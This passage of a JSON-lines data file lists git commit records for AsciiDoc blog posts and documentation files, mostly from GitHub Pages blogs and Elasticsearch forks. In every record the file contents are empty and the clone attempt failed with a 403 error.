tedata\/elasticsearch,zeroctu\/elasticsearch,yanjunh\/elasticsearch,geidies\/elasticsearch,kkirsche\/elasticsearch,lzo\/elasticsearch-1,iantruslove\/elasticsearch,artnowo\/elasticsearch,tebriel\/elasticsearch,gmarz\/elasticsearch,szroland\/elasticsearch,YosuaMichael\/elasticsearch,khiraiwa\/elasticsearch,xingguang2013\/elasticsearch,slavau\/elasticsearch,Clairebi\/ElasticsearchClone,btiernay\/elasticsearch,jw0201\/elastic,nrkkalyan\/elasticsearch,ZTE-PaaS\/elasticsearch,kubum\/elasticsearch,fekaputra\/elasticsearch,amaliujia\/elasticsearch,wittyameta\/elasticsearch,YosuaMichael\/elasticsearch,uschindler\/elasticsearch,huypx1292\/elasticsearch,hirdesh2008\/elasticsearch,iantruslove\/elasticsearch,iantruslove\/elasticsearch,pozhidaevak\/elasticsearch,mcku\/elasticsearch,andrejserafim\/elasticsearch,HarishAtGitHub\/elasticsearch,hafkensite\/elasticsearch,NBSW\/elasticsearch,camilojd\/elasticsearch,ThalaivaStars\/OrgRepo1,awislowski\/elasticsearch,sc0ttkclark\/elasticsearch,marcuswr\/elasticsearch-dateline,hanswang\/elasticsearch,lightslife\/elasticsearch,kalburgimanjunath\/elasticsearch,artnowo\/elasticsearch,feiqitian\/elasticsearch,mjhennig\/elasticsearch,hanswang\/elasticsearch,Fsero\/elasticsearch,beiske\/elasticsearch,mute\/elasticsearch,micpalmia\/elasticsearch,sauravmondallive\/elasticsearch,beiske\/elasticsearch,kenshin233\/elasticsearch,kalimatas\/elasticsearch,rhoml\/elasticsearch,kalburgimanjunath\/elasticsearch,abhijitiitr\/es,abibell\/elasticsearch,maddin2016\/elasticsearch,areek\/elasticsearch,franklanganke\/elasticsearch,achow\/elasticsearch,bawse\/elasticsearch,YosuaMichael\/elasticsearch,tahaemin\/elasticsearch,salyh\/elasticsearch,mjhennig\/elasticsearch,ricardocerq\/elasticsearch,yuy168\/elasticsearch,pablocastro\/elasticsearch,jpountz\/elasticsearch,snikch\/elasticsearch,Stacey-Gammon\/elasticsearch,clintongormley\/elasticsearch,amaliujia\/elasticsearch,mute\/elasticsearch,KimTaehee\/elasticsearch,markharwood\/elasticsearch,jaynblue\/elasticsearch,golubev\/elasticsearch,qwerty4030\/elasticsearch,xuzha\/elasticsearch,vietlq\/elasticsearch,xingguang2013\/elasticsearch,Chhunlong\/elasticsearch,strapdata\/elassandra5-rc,likaiwalkman\/elasticsearch,scorpionvicky\/elasticsearch,pablocastro\/elasticsearch,alexbrasetvik\/elasticsearch,umeshdangat\/elasticsearch,wbowling\/elasticsearch,thecocce\/elasticsearch,iantruslove\/elasticsearch,iacdingping\/elasticsearch,kcompher\/elasticsearch,sdauletau\/elasticsearch,MisterAndersen\/elasticsearch,Clairebi\/ElasticsearchClone,pablocastro\/elasticsearch,a2lin\/elasticsearch,jpountz\/elasticsearch,Microsoft\/elasticsearch,petmit\/elasticsearch,phani546\/elasticsearch,obourgain\/elasticsearch,tahaemin\/elasticsearch,infusionsoft\/elasticsearch,Collaborne\/elasticsearch,nazarewk\/elasticsearch,lzo\/elasticsearch-1,awislowski\/elasticsearch,mm0\/elasticsearch,andrejserafim\/elasticsearch,marcuswr\/elasticsearch-dateline,gfyoung\/elasticsearch,chrismwendt\/elasticsearch,TonyChai24\/ESSource,ckclark\/elasticsearch,xuzha\/elasticsearch,nomoa\/elasticsearch,rmuir\/elasticsearch,apepper\/elasticsearch,sposam\/elasticsearch,smflorentino\/elasticsearch,raishiv\/elasticsearch,onegambler\/elasticsearch,polyfractal\/elasticsearch,myelin\/elasticsearch,kkirsche\/elasticsearch,ivansun1010\/elasticsearch,Uiho\/elasticsearch,MaineC\/elasticsearch,socialrank\/elasticsearch,henakamaMSFT\/elasticsearch,raishiv\/elasticsearch,onegambler\/elasticsearch,weipinghe\/elasticsearch,rento19962\/elasticsearch,SergVro\/elasticsearch,polyfractal\/elasticsearch,hirdesh2008\/elasticsearch,rmuir\/elasticsearch,fekaputra\/elasticsearch,liweinan0423\/elasticsearch,huypx1292\/elasticsearch,girirajsharma\/elasticsearch,davidvgalbraith\/elasticsearch,Brijeshrpatel9\/elasticsearch,ricardocerq\/elasticsearch,jchampion\/elasticsearch,likaiwalkman\/elasticsearch,wenpos\/elasticsearch,chirilo\/elasticsearch,ESamir\/elasticsearch,ZTE-PaaS\/elasticsearch,smflorentino\/elasticsearch,jpountz\/elasticsearch,tcucchietti\/elasticsearch,NBSW\/elasticsearch,mjhennig\/elasticsearch,MetSystem\/elasticsearch,clintongormley\/elasticsearch,opendatasoft\/elasticsearch,hydro2k\/elasticsearch,Liziyao\/elasticsearch,markllama\/elasticsearch,mortonsykes\/elasticsearch,rajanm\/elasticsearch,janmejay\/elasticsearch,MetSystem\/elasticsearch,Uiho\/elasticsearch,i-am-Nathan\/elasticsearch,alexkuk\/elasticsearch,Collaborne\/elasticsearch,henakamaMSFT\/elasticsearch,jsgao0\/elasticsearch,koxa29\/elasticsearch,rmuir\/elasticsearch,sscarduzio\/elasticsearch,gingerwizard\/elasticsearch,masaruh\/elasticsearch,Rygbee\/elasticsearch,xpandan\/elasticsearch,queirozfcom\/elasticsearch,camilojd\/elasticsearch,TonyChai24\/ESSource,vrkansagara\/elasticsearch,Flipkart\/elasticsearch,EasonYi\/elasticsearch,dpursehouse\/elasticsearch,phani546\/elasticsearch,gingerwizard\/elasticsearch,mute\/elasticsearch,mbrukman\/elasticsearch,HarishAtGitHub\/elasticsearch,mcku\/elasticsearch,Shekharrajak\/elasticsearch,dylan8902\/elasticsearch,btiernay\/elasticsearch,glefloch\/elasticsearch,slavau\/elasticsearch,brandonkearby\/elasticsearch,wimvds\/elasticsearch,mbrukman\/elasticsearch,nilabhsagar\/elasticsearch,ydsakyclguozi\/elasticsearch,MisterAndersen\/elasticsearch,hanst\/elasticsearch,jchampion\/elasticsearch,shreejay\/elasticsearch,wimvds\/elasticsearch,humandb\/elasticsearch,sjohnr\/elasticsearch,wuranbo\/elasticsearch,strapdata\/elassandra-test,shreejay\/elasticsearch,jimhooker2002\/elasticsearch,nilabhsagar\/elasticsearch,pablocastro\/elasticsearch,boliza\/elasticsearch,zkidkid\/elasticsearch,AshishThakur\/elasticsearch,jprante\/elasticsearch,hydro2k\/elasticsearch,Chhunlong\/elasticsearch,kunallimaye\/elasticsearch,micpalmia\/elasticsearch,mm0\/elasticsearch,scorpionvicky\/elasticsearch,pranavraman\/elasticsearch,loconsolutions\/elasticsearch,milodky\/elasticsearch,areek\/elasticsearch,franklanganke\/elasticsearch,TonyChai24\/ESSource,C-Bish\/elasticsearch,JackyMai\/elasticsearch,nellicus\/elasticsearch,ulkas\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,Siddartha07\/elasticsearch,jbertouch\/elasticsearch,petabytedata\/elasticsearch,jimczi\/elasticsearch,iamjakob\/elasticsearch,lydonchandra\/elasticsearch,mohit\/elasticsearch,Siddartha07\/elasticsearch,knight1128\/elasticsearch,huypx1292\/elasticsearch,brandonkearby\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,dantuffery\/elasticsearch,mjason3\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,skearns64\/elasticsearch,wangtuo\/elasticsearch,kubum\/elasticsearch,mnylen\/elasticsearch,vrkansagara\/elasticsearch,mnylen\/elasticsearch,sc0ttkclark\/elasticsearch,strapdata\/elassandra,lzo\/elasticsearch-1,markwalkom\/elasticsearch,jw0201\/elastic,gfyoung\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,nomoa\/elasticsearch,davidvgalbraith\/elasticsearch,F0lha\/elasticsearch,KimTaehee\/elasticsearch,kevinkluge\/elasticsearch,szroland\/elasticsearch,nrkkalyan\/elasticsearch,Charlesdong\/elasticsearch,rlugojr\/elasticsearch,vvcephei\/elasticsearch,jimczi\/elasticsearch,ThalaivaStars\/OrgRepo1,LeoYao\/elasticsearch,NBSW\/elasticsearch,mikemccand\/elasticsearch,zhaocloud\/elasticsearch,schonfeld\/elasticsearch,cwurm\/elasticsearch,Widen\/elasticsearch,kingaj\/elasticsearch,koxa29\/elasticsearch,djschny\/elasticsearch,luiseduardohdbackup\/elasticsearch,vroyer\/elassandra,amaliujia\/elasticsearch,caengcjd\/elasticsearch,markwalkom\/elasticsearch,bestwpw\/elasticsearch,abhijitiitr\/es,skearns64\/elasticsearch,franklanganke\/elasticsearch,Uiho\/elasticsearch,kkirsche\/elasticsearch,kevinkluge\/elasticsearch,lydonchandra\/elasticsearch,GlenRSmith\/elasticsearch,mapr\/elasticsearch,beiske\/elasticsearch,amit-shar\/elasticsearch,MjAbuz\/elasticsearch,Fsero\/elasticsearch,zhiqinghuang\/elasticsearch,kcompher\/elasticsearch,pozhidaevak\/elasticsearch,marcuswr\/elasticsearch-dateline,javachengwc\/elasticsearch,micpalmia\/elasticsearch,rajanm\/elasticsearch,acchen97\/elasticsearch,kubum\/elasticsearch,sarwarbhuiyan\/elasticsearch,nrkkalyan\/elasticsearch,beiske\/elasticsearch,kalimatas\/elasticsearch,LewayneNaidoo\/elasticsearch,C-Bish\/elasticsearch,xingguang2013\/elasticsearch,luiseduardohdbackup\/elasticsearch,kalimatas\/elasticsearch,dantuffery\/elasticsearch,geidies\/elasticsearch,henakamaMSFT\/elasticsearch,kcompher\/elasticsearch,nazarewk\/elasticsearch,codebunt\/elasticsearch,schonfeld\/elasticsearch,loconsolutions\/elasticsearch,salyh\/elasticsearch,ricardocerq\/elasticsearch,ckclark\/elasticsearch,ImpressTV\/elasticsearch,sreeramjayan\/elasticsearch,jimczi\/elasticsearch,btiernay\/elasticsearch,IanvsPoplicola\/elasticsearch,jprante\/elasticsearch,zkidkid\/elasticsearch,amit-shar\/elasticsearch,Brijeshrpatel9\/elasticsearch,queirozfcom\/elasticsearch,markllama\/elasticsearch,scottsom\/elasticsearch,himanshuag\/elasticsearch,JervyShi\/elasticsearch,brwe\/elasticsearch,schonfeld\/elasticsearch,sscarduzio\/elasticsearch,myelin\/elasticsearch,alexbrasetvik\/elasticsearch,markllama\/elasticsearch,hafkensite\/elasticsearch,springning\/elasticsearch,wayeast\/elasticsearch,naveenhooda2000\/elasticsearch,LeoYao\/elasticsearch,naveenhooda2000\/elasticsearch,pranavraman\/elasticsearch,szroland\/elasticsearch,HonzaKral\/elasticsearch,wuranbo\/elasticsearch,gmarz\/elasticsearch,IanvsPoplicola\/elasticsearch,karthikjaps\/elasticsearch,ulkas\/elasticsearch,Widen\/elasticsearch,MisterAndersen\/elasticsearch,JSCooke\/elasticsearch,weipinghe\/elasticsearch,vingupta3\/elasticsearch,sarwarbhuiyan\/elasticsearch,nellicus\/elasticsearch,artnowo\/elasticsearch,andrestc\/elasticsearch,huanzhong\/elasticsearch,easonC\/elasticsearch,humandb\/elasticsearch,raishiv\/elasticsearch,easonC\/elasticsearch,tsohil\/elasticsearch,hirdesh2008\/elasticsearch,jbertouch\/elasticsearch,Widen\/elasticsearch,MichaelLiZhou\/elasticsearch,lchennup\/elasticsearch,vingupta3\/elasticsearch,djschny\/elasticsearch,glefloch\/elasticsearch,wenpos\/elasticsearch,qwerty4030\/elasticsearch,ajhalani\/elasticsearch,TonyChai24\/ESSource,rlugojr\/elasticsearch,cwurm\/elasticsearch,peschlowp\/elasticsearch,C-Bish\/elasticsearch,kalburgimanjunath\/elasticsearch,Liziyao\/elasticsearch,strapdata\/elassandra5-rc,scottsom\/elasticsearch,lmtwga\/elasticsearch,zhiqinghuang\/elasticsearch,areek\/elasticsearch,szroland\/elasticsearch,strapdata\/elassandra-test,springning\/elasticsearch,awislowski\/elasticsearch,AndreKR\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,kimimj\/elasticsearch,mgalushka\/elasticsearch,zkidkid\/elasticsearch,lmtwga\/elasticsearch,mrorii\/elasticsearch,nilabhsagar\/elasticsearch,wayeast\/elasticsearch,iacdingping\/elasticsearch,Brijeshrpatel9\/elasticsearch,phani546\/elasticsearch,vrkansagara\/elasticsearch,fekaputra\/elasticsearch,myelin\/elasticsearch,fekaputra\/elasticsearch,cnfire\/elasticsearch-1,dpursehouse\/elasticsearch,ouyangkongtong\/elasticsearch,lzo\/elasticsearch-1,elancom\/elasticsearch,vietlq\/elasticsearch,ImpressTV\/elasticsearch,sneivandt\/elasticsearch,abhijitiitr\/es,himanshuag\/elasticsearch,javachengwc\/elasticsearch,tebriel\/elasticsearch,knight1128\/elasticsearch,rmuir\/elasticsearch,mgalushka\/elasticsearch,lydonchandra\/elasticsearch,feiqitian\/elasticsearch,Kakakakakku\/elasticsearch,huanzhong\/elasticsearch,Collaborne\/elasticsearch,sreeramjayan\/elasticsearch,milodky\/elasticsearch,adrianbk\/elasticsearch,Charlesdong\/elasticsearch,Asimov4\/elasticsearch,18098924759\/elasticsearch,milodky\/elasticsearch,LewayneNaidoo\/elasticsearch,skearns64\/elasticsearch,sreeramjayan\/elasticsearch,vvcephei\/elasticsearch,wuranbo\/elasticsearch,smflorentino\/elasticsearch,mohit\/elasticsearch,achow\/elasticsearch,cwurm\/elasticsearch,combinatorist\/elasticsearch,adrianbk\/elasticsearch,jaynblue\/elasticsearch,socialrank\/elasticsearch,i-am-Nathan\/elasticsearch,amaliujia\/elasticsearch,snikch\/elasticsearch,hechunwen\/elasticsearch,alexbrasetvik\/elasticsearch,lchennup\/elasticsearch,awislowski\/elasticsearch,hydro2k\/elasticsearch,milodky\/elasticsearch,petabytedata\/elasticsearch,elancom\/elasticsearch,yuy168\/elasticsearch,jchampion\/elasticsearch,sarwarbhuiyan\/elasticsearch,vvcephei\/elasticsearch,markllama\/elasticsearch,Asimov4\/elasticsearch,overcome\/elasticsearch,LewayneNaidoo\/elasticsearch,tahaemin\/elasticsearch,kubum\/elasticsearch,tsohil\/elasticsearch,wayeast\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,infusionsoft\/elasticsearch,mikemccand\/elasticsearch,zhiqinghuang\/elasticsearch,Shepard1212\/elasticsearch,MichaelLiZhou\/elasticsearch,jimczi\/elasticsearch,jango2015\/elasticsearch,snikch\/elasticsearch,kimimj\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,hydro2k\/elasticsearch,polyfractal\/elasticsearch,rhoml\/elasticsearch,markharwood\/elasticsearch,henakamaMSFT\/elasticsearch,chirilo\/elasticsearch,salyh\/elasticsearch,mcku\/elasticsearch,hydro2k\/elasticsearch,HarishAtGitHub\/elasticsearch,golubev\/elasticsearch,HonzaKral\/elasticsearch,golubev\/elasticsearch,mcku\/elasticsearch,combinatorist\/elasticsearch,sc0ttkclark\/elasticsearch,tebriel\/elasticsearch,vietlq\/elasticsearch,alexshadow007\/elasticsearch,iacdingping\/elasticsearch,strapdata\/elassandra5-rc,mkis-\/elasticsearch,kalburgimanjunath\/elasticsearch,trangvh\/elasticsearch,EasonYi\/elasticsearch,qwerty4030\/elasticsearch,schonfeld\/elasticsearch,franklanganke\/elasticsearch,jw0201\/elastic,alexkuk\/elasticsearch,himanshuag\/elasticsearch,onegambler\/elasticsearch,ulkas\/elasticsearch,petabytedata\/elasticsearch,polyfractal\/elasticsearch,Flipkart\/elasticsearch,wuranbo\/elasticsearch,HarishAtGitHub\/elasticsearch,pablocastro\/elasticsearch,mcku\/elasticsearch,girirajsharma\/elasticsearch,rlugojr\/elasticsearch,ivansun1010\/elasticsearch,mbrukman\/elasticsearch,abhijitiitr\/es,mikemccand\/elasticsearch,HarishAtGitHub\/elasticsearch,thecocce\/elasticsearch,springning\/elasticsearch,zhiqinghuang\/elasticsearch,MichaelLiZhou\/elasticsearch,janmejay\/elasticsearch","old_file":"docs\/reference\/modules\/snapshots.asciidoc","new_file":"docs\/reference\/modules\/snapshots.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a280b0fa5989c21166ee3d50787bb5c92ee1d1b5","subject":"OSGi deployment manual","message":"OSGi deployment manual\n\n","repos":"asashour\/framework,mstahv\/framework,Darsstar\/framework,asashour\/framework,asashour\/framework,Darsstar\/framework,Darsstar\/framework,mstahv\/framework,mstahv\/framework,mstahv\/framework,Darsstar\/framework,asashour\/framework,asashour\/framework,mstahv\/framework,Darsstar\/framework","old_file":"documentation\/portal\/portal-osgi.asciidoc","new_file":"documentation\/portal\/portal-osgi.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mstahv\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c50f37feb52a9c6a07d94f38d64e5c87fdd5dc80","subject":"Update 2016-10-04-CentOS-7-FirewallD-simple-description-and-links.adoc","message":"Update 2016-10-04-CentOS-7-FirewallD-simple-description-and-links.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-10-04-CentOS-7-FirewallD-simple-description-and-links.adoc","new_file":"_posts\/2016-10-04-CentOS-7-FirewallD-simple-description-and-links.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"73fe717a8050a10bd7faef2eddd6bc0496e751c8","subject":"y2b create post Which Smartphone Do They ACTUALLY Use? --- MKBHD, Austin Evans, Linus + More","message":"y2b create post Which Smartphone Do They ACTUALLY Use? --- MKBHD, Austin Evans, Linus + More","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-16-Which-Smartphone-Do-They-ACTUALLY-Use--MKBHD-Austin-Evans-Linus--More.adoc","new_file":"_posts\/2018-01-16-Which-Smartphone-Do-They-ACTUALLY-Use--MKBHD-Austin-Evans-Linus--More.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f4efd5a9a849d50bb687b59f7f9cf8be6fa1a4fd","subject":"Update 2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","message":"Update 2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","new_file":"_posts\/2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e259a0e96b9105cb98c6626ddd3ae97c4742fa57","subject":"y2b create post Deal Therapy: Best Headphones Under $100, Canon T4i Kit for $648 \\u0026 More!","message":"y2b create post Deal Therapy: Best Headphones Under $100, Canon T4i Kit for $648 \\u0026 More!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-04-15-Deal-Therapy-Best-Headphones-Under-100-Canon-T4i-Kit-for-648-u0026-More.adoc","new_file":"_posts\/2013-04-15-Deal-Therapy-Best-Headphones-Under-100-Canon-T4i-Kit-for-648-u0026-More.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d7b1664c8049614f39b49489b8777e7b36ef8825","subject":"Update 2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","message":"Update 2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","new_file":"_posts\/2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"833593715dd6f62736b83503329d1e7640fa4505","subject":"Update 2015-10-12-Four-Acts-of-Citizenry.adoc","message":"Update 2015-10-12-Four-Acts-of-Citizenry.adoc","repos":"mazongo\/mazongo.github.io,mazongo\/mazongo.github.io,mazongo\/mazongo.github.io","old_file":"_posts\/2015-10-12-Four-Acts-of-Citizenry.adoc","new_file":"_posts\/2015-10-12-Four-Acts-of-Citizenry.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mazongo\/mazongo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e887078f9e6977d67b05e933542ae79d876ecb4a","subject":"Hawkular Services 0.0.2.Final blog post (#181)","message":"Hawkular Services 0.0.2.Final blog post (#181)\n\n","repos":"jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,tsegismont\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2016\/06\/14\/hawkular-services-0.0.2.Final.adoc","new_file":"src\/main\/jbake\/content\/blog\/2016\/06\/14\/hawkular-services-0.0.2.Final.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"44959294bbec524db80e227bf717597ef4bbba55","subject":"Update 2015-06-28-First-Post.adoc","message":"Update 2015-06-28-First-Post.adoc","repos":"Vanell\/vanell.github.io,Vanell\/vanell.github.io,Vanell\/vanell.github.io","old_file":"_posts\/2015-06-28-First-Post.adoc","new_file":"_posts\/2015-06-28-First-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanell\/vanell.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"191b014bae852690d5e7ede29c18fdf627aaaffc","subject":"Update 2016-08-08-2016-08-08.adoc","message":"Update 2016-08-08-2016-08-08.adoc","repos":"tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io","old_file":"_posts\/2016-08-08-2016-08-08.adoc","new_file":"_posts\/2016-08-08-2016-08-08.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tamakinkun\/tamakinkun.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"27b8a9d0b5e241ba6410781b3cb2d18de24cd006","subject":"Update 2017-02-11-Drawatchio.adoc","message":"Update 2017-02-11-Drawatchio.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-11-Drawatchio.adoc","new_file":"_posts\/2017-02-11-Drawatchio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b753d6dc426de76d74e4e00b52b1c2b1c667db96","subject":"Update 2017-02-17-First-Podcast-Episode.adoc","message":"Update 2017-02-17-First-Podcast-Episode.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2017-02-17-First-Podcast-Episode.adoc","new_file":"_posts\/2017-02-17-First-Podcast-Episode.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"361f977ffd03f6c82ec44dbca07e80ef6a91b8a7","subject":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","message":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","repos":"JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io","old_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JithinPavithran\/JithinPavithran.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c0ede6d7a96223325dc272aff5d4cd0934492c23","subject":"Formatting changes","message":"Formatting changes\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"week02.asciidoc","new_file":"week02.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8bd64fdd4d3bcecdd6d9ac507b92e221e4a02158","subject":"Update 2016-02-26-Friday-Favorites-What-is-your-favorite-parade-in-Disney-World-or-Disneyland.adoc","message":"Update 2016-02-26-Friday-Favorites-What-is-your-favorite-parade-in-Disney-World-or-Disneyland.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-02-26-Friday-Favorites-What-is-your-favorite-parade-in-Disney-World-or-Disneyland.adoc","new_file":"_posts\/2016-02-26-Friday-Favorites-What-is-your-favorite-parade-in-Disney-World-or-Disneyland.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c4da61b800b4ef7d060148cc0d07e8494197f91","subject":"0.6.1 release announcement","message":"0.6.1 release announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2017-10-26-debezium-0-6-1-released.adoc","new_file":"blog\/2017-10-26-debezium-0-6-1-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8fe3d5cc352151a82d0d320b26be201d9e83273c","subject":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","message":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"549a2a6de71c1e95b29465dfc6696b0bb8454687","subject":"y2b create post Logitech Z623 Speaker System Unboxing \\u0026 Overview","message":"y2b create post Logitech Z623 Speaker System Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-08-29-Logitech-Z623-Speaker-System-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-08-29-Logitech-Z623-Speaker-System-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e1c727d63bed84562b978e41e99613bc59807d0","subject":"Update 2017-01-21-Automating-your-builds-with-continuous-integration.adoc","message":"Update 